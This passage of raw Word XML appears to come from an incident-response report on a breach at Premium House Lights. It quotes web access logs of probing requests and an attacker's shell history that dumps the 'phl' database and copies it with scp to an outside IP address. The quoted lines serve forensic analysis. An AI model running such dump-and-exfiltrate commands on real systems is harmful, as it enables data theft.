          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143954D6" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03AE6335" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7189AF9E" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02E470FB" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705C04F0" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42410D2D" w14:textId="10CF00BD" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00E14676">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc180595386"/>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web Server Access Logs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="54A34B31" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The web server access logs captured all incoming requests, including suspicious ones originating from the attacker’s IP addresses. The attacker initially probed the web server for vulnerabilities before escalating the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBEFCC" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17887A75" w14:textId="4A232840" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Log entries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CEA44E" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>arduino</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37824151" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10995E" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>136.243.111.17 - - [19/Feb/2022:21:56:11 +0000] "GET /randomfile1 HTTP/1.1" 404 512 "-" "-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D875ED" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>138.201.202.232 - - [19/Feb/2022:21:56:11 +0000] "GET /archive HTTP/1.1" 404 512 "-" "-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930E994" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>138.68.92.163 - - [19/Feb/2022:21:58:22 +0000] "GET /software HTTP/1.1" 404 512 "-" "-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F4E63" w14:textId="42C137E8" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00063466" w:rsidP="00E14676">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="_Toc180595387"/>
      <w:r w:rsidR="00767AE7" w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Shell History Logs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="230EFAA4" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The shell history logs captured all commands executed by the attacker once they gained access to the web server. These logs are crucial for understanding the actions the attacker took to escalate privileges, access the database, and exfiltrate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B234C8" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Shell log entries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F8FE9" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47609A69" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601093E5" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:00:27 netstat -an | grep LISTEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7706ABA7" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:00:55 mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F42259" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:01:45 mysqldump -u root -p phl &gt; /tmp/phl_db_backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D693C4" w14:textId="77777777" w:rsidR="00767AE7" w:rsidRPr="00767AE7" w:rsidRDefault="00767AE7" w:rsidP="00767AE7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00767AE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>22:02:26 scp /tmp/phl_db_backup.sql root@178.62.228.28:/home/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375DE9E" w14:textId="77777777" w:rsidR="00301412" w:rsidRDefault="00301412" w:rsidP="00301412">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B00A07C" w14:textId="1D65249D" w:rsidR="00301412" w:rsidRDefault="00301412" w:rsidP="00301412">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc180595388"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251766272" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EB49878" wp14:editId="56A6817D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1123950</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5934075" cy="5229225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21561"/>
                <wp:lineTo x="21565" y="21561"/>
                <wp:lineTo x="21565" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1202196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anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Premium House Lights Network Diagram</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5A27589C" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="58DDADED" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="2F333A5F" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="2073940B" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="4BDEF902" w14:textId="5495ED59" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="473842AF" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79B28E66" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E7DF00" w14:textId="77777777" w:rsidR="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B49077" w14:textId="1D3BB3C3" w:rsidR="00E14676" w:rsidRPr="00E14676" w:rsidRDefault="00E14676" w:rsidP="00E14676">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc180595389"/>
      <w:r w:rsidRPr="00E14676">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>References &amp; Citations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:t xml:space="preserve">Premium House Lights Inc. (2022, February 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Webserver access log</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:t>. Internal data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18170691" w14:textId="77777777" w:rsidR="00E14676" w:rsidRPr="00E14676" w:rsidRDefault="00E14676" w:rsidP="00E14676">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E14676">
        <w:t xml:space="preserve">Premium House Lights Inc. (2022, February 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database access log</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:t>. Internal data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46639A47" w14:textId="77777777" w:rsidR="00E14676" w:rsidRPr="00E14676" w:rsidRDefault="00E14676" w:rsidP="00E14676">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E14676">
        <w:t xml:space="preserve">Premium House Lights Inc. (2022, February 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shell command log</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:t>. Internal data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76227912" w14:textId="77777777" w:rsidR="00E14676" w:rsidRPr="00E14676" w:rsidRDefault="00E14676" w:rsidP="00E14676">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E14676">
        <w:t xml:space="preserve">Premium House Lights Inc. (2022, February 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:t>. Internal data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238B9B3B" w14:textId="77777777" w:rsidR="00E14676" w:rsidRPr="00E14676" w:rsidRDefault="00E14676" w:rsidP="00E14676">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E14676">
        <w:t xml:space="preserve">Premium House Lights Inc. (2022, February 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database dump file</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:t>. Internal data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCEEB4B" w14:textId="77777777" w:rsidR="00E14676" w:rsidRPr="00E14676" w:rsidRDefault="00E14676" w:rsidP="00E14676">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00E14676">
        <w:t xml:space="preserve">Premium House Lights Inc. (2022, February 19). </w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security hash file</w:t>
      </w:r>
      <w:r w:rsidRPr="00E14676">
        <w:t>. Internal data source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DD5EA" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2790"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59571CA4" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="5F506B67" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="348698EC" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="24B98E7A" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="5770EB89" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="45226EB9" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="43BFA453" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="3E2026CF" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="57CF080C" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="627F5E28" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="41B462C8" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="359018EA" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="6DAE0D36" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="628F64E6" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:p w14:paraId="5DD8788F" w14:textId="77777777" w:rsidR="00063466" w:rsidRPr="00063466" w:rsidRDefault="00063466" w:rsidP="00063466"/>
    <w:sectPr w:rsidR="00063466" w:rsidRPr="00063466" w:rsidSect="0054198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B0A93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9328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22EB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B10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45BCB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="772A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815BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="796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B33B5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BCBE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461BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A5E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15333"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="214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6993">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="552928393">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1003321932">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1925259557">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1426803798">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="958872354">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1634825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9F"/>
    <w:rsid w:val="00063466"/>
    <w:rsid w:val="00216256"/>
    <w:rsid w:val="00233520"/>
    <w:rsid w:val="002817B5"/>
    <w:rsid w:val="00301412"/>
    <w:rsid w:val="003776AA"/>
    <w:rsid w:val="00450B99"/>
    <w:rsid w:val="00541985"/>
    <w:rsid w:val="006906C5"/>
    <w:rsid w:val="006E5C11"/>
    <w:rsid w:val="00735825"/>
    <w:rsid w:val="00767AE7"/>
    <w:rsid w:val="00776399"/>
    <w:rsid w:val="008B24DF"/>
    <w:rsid w:val="00942882"/>
    <w:rsid w:val="00973D89"/>
    <w:rsid w:val="009E2C7E"/>
    <w:rsid w:val="009F25F3"/>
    <w:rsid w:val="00A1437D"/>
    <w:rsid w:val="00A25203"/>
    <w:rsid w:val="00AE5EB7"/>
    <w:rsid w:val="00B17A9F"/>
    <w:rsid w:val="00BF2CF4"/>
    <w:rsid w:val="00CD218F"/>
    <w:rsid w:val="00E14676"/>
    <w:rsid w:val="00EE6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AC70"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F174CFDD-A3A1-4F9B-92D1-04328058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99"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00B17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9F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00B17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9F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00B17A9F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B17A9F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00B17A9F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00B17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A9F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00B17A9F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="0054198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41985"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00541985"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00541985"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00541985"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
